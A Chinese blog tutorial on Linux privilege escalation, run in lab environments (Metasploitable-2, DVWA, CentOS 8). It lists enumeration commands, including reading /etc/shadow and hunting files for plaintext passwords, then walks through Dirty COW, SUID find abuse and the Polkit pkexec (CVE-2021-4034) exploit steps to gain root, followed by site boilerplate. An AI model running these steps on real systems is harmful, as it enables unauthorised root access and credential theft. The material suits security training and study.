Linux权限提升

这篇具有很好参考价值的文章主要介绍了Linux权限提升。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

提权必备命令

linux提权寻找exp: https://www.exploit-db.com/ http://ww1.1337day.com/ http://www.securiteam.com http://www.securityfocus.com http://www.exploitsearch.net http://metasploit.com/modules/ http://securityreason.com http://seclists.org/fulldisclosure/ http://www.google.com

用户信息相关命令: id ; whoami ; who ; w ; last ; cat /etc/passwd ; cat /etc/group ; cat /etc/shadow ; ls -alh /var/mail/ ;

列出超级用户: grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' ; awk -F: '($3 == "0") {print}' /etc/passwd ; cat /etc/sudoers ; sudo -l;

查看操作系统版本:

cat /etc/issue ; cat /etc/*-release ; cat /etc/lsb-release # Debian ; cat /etc/redhat-release # Redhat; 查看内核版本: cat /proc/version ; uname -a ; uname -mrs ; rpm -q kernel ; dmesg | grep Linux ; ls /boot | grep vmlinuz-;

查看环境变量: cat /etc/profilecat ; cat /etc/bashrccat ; cat ~/.bash_profilecat ; cat ~/.bashrccat ; cat ~/.bash_logout ; env ; set ;

查看正在运行的程序及对应的用户权限: ps aux ; ps -ef ; top ; cat /etc/services ;

查看ROOT权限运行的进程: ps aux | grep root ; ps -ef | grep root ;

查看安装软件: ls -alh /usr/bin/ ; ls -alh /sbin/ ; dpkg -l ; rpm -qa ; ls -alh /var/cache/apt/archives ; ls -alh /var/cache/yum/ ;

查看服务的配置文件: cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/apache2/apache2.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.r./'

查看计划任务: crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /var/spool/cron/crontabs/root cat /etc/crontab

查找明文账号密码: grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

查看支持哪些语言: find / -name perl* find / -name python* find / -name gcc* find / -name cc

查看可上传方式: find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp

查看缓存: arp -e route /sbin/route -nee

查看网络通信: lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last

Linux提权实战

1.Linux脏牛提权

环境:Metasploitable-2 (exp已上传到资源中) # 下载 https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ # 账号密码 msfadmin/msfadmin 漏洞简介:CVE-2016-5195,即 Dirty COW,俗称「脏牛」漏洞。它是 Linux Kernel 中的条件竞争漏 洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)技术中存在的逻辑漏洞完成对文件的 越权读写,恶意用户可利用此漏洞来获取高权限。

漏洞原理:linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权 限。

影响版本:自2007年9月 linux kernel 2.6.22 被引入,直到2018年linux kernel 4.8.3, 4.7.9, 4.4.26 之 后才被彻底修复,影响在此之间的所有基于其中版本范围的Linux发行版。

脏牛提权:提权之前为msfadmin权限

Linux权限提升

上传提权exp dirty.c,使用gcc进行编译:gcc -pthread dirty.c -o dirty -lcrypt

Linux权限提升

进行提权(root是随便输入的密码):./dirty root

Linux权限提升

查看/etc/passwd发现多了一个用户firefart

Linux权限提升

su firefart,输入密码即root,成功提权至root权限

Linux权限提升

2.SUID提权

所用环境:docker pull docker.io/citizenstig/dvwa chmod u+s /usr/bin/find SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的 权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。

已知的可用来提权的linux可行性的文件列表如下: nmap vim find bash more less nano cp

拿到webshell后,查看当前权限为www-data

Linux权限提升

查找具有root权限的SUID的文件

find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \;

Linux权限提升

我们发现find具有SUID权限

执行指令find / -name post.php -exec"whoami" \;进行提权

Linux权限提升

3.Linux Polkit本地提权

所用环境:centos8 (EXP已上传到资源) 描述:Polkit 是用于在类 Unix 操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进 程进行通信的有组织的方式。CVE-2021-4034,polkit 的 pkexec 存在本地权限提升漏洞,已获得普通 权限的攻击者可通过此漏洞获取root权限。 利用:上传exp,给权限执行cve-2021-4034-poc提权获得root权限

进入CVE-2021-4034文件夹下,使用make编译

Linux权限提升

然后我们切换到普通用户,并执行cve-2021-4034

Linux权限提升

成功提权文章来源地址https://www.toymoban.com/news/detail-464965.html

Linux权限提升

到了这里,关于Linux权限提升的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 权限提升:网站漏洞(提权思路.)

    权限提升简称 提权 ,由于 操作系统都是多用户操作系统 , 用户之间都有权限控制 ,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通

    2024年02月05日
    浏览(43)
  • 权限提升:网站后台.(提权思路.)

    权限提升简称 提权 ,由于 操作系统都是多用户操作系统 , 用户之间都有权限控制 ,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通

    2024年02月01日
    浏览(33)
  • 操作系统权限提升(十四)之绕过UAC提权-基于白名单AutoElevate绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!! 利用白名单程序的本质实际上是劫持注册表,这种方法主要是通过寻找autoElevated属性为

    2024年02月16日
    浏览(39)
  • 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!! 拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC 执行添加用户的命令时显示拒绝访问 使用CS自带的插件进行绕过提权 直接提到了system权限

    2024年02月16日
    浏览(42)
  • 【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限

    1、具体有哪些权限需要我们了解掌握的? 后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等 2、以上常见权限获取方法简要归类说明? 后台权限:SQL注入 , 数据库备份泄露,默认或弱口令等获取帐号密码进入 网站权限:后台提升至网站权限,RCE或文件操

    2024年02月10日
    浏览(48)
  • 操作系统权限提升(三)之Windows系统内核溢出漏洞提权

    系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!! 溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取 Windows操作系统System权限,其中溢出,提权

    2024年02月14日
    浏览(37)
  • 【权限提升】Linux Sudo权限提升漏洞(CVE-2023-22809)

    Sudo存在权限提升漏洞,攻击者可过特定的payload获取服务器 ROOT权限 sudo (su \\\" do\\\")允许系统管理员将权限委托给某些用户(或用户组),能够以ROOT用户或其他用户身份运行部分(或全部)命令。 sudo使用用户提供的环境变量让用户选择他们所选择的编辑器。的内容其中一个变量扩展了传

    2023年04月25日
    浏览(42)
  • Linux权限提升

    linux提权寻找exp: https://www.exploit-db.com/ http://ww1.1337day.com/ http://www.securiteam.com http://www.securityfocus.com http://www.exploitsearch.net http://metasploit.com/modules/ http://securityreason.com http://seclists.org/fulldisclosure/ http://www.google.com 用户信息相关命令: id ; whoami ; who ; w ; last ; cat /etc/passwd ;

    2024年02月07日
    浏览(38)
  • Linux 查看版本和用户权限提升实践心得

    使用 lsb_release 命令: 该命令将显示Linux Mint的版本信息,包括发行版号码、描述和发布日期。 查看 /etc/os-release 文件: 在该文件中,您可以找到有关Linux Mint版本的详细信息,包括版本号、名称和ID。 使用 uname 命令: 根据输出信息,使用的是基于Ubuntu内核的Linux发行版。该输

    2024年02月14日
    浏览(52)
  • Linux DirtyPipe权限提升漏洞 CVE-2022-0847

    CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用

    2024年02月09日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包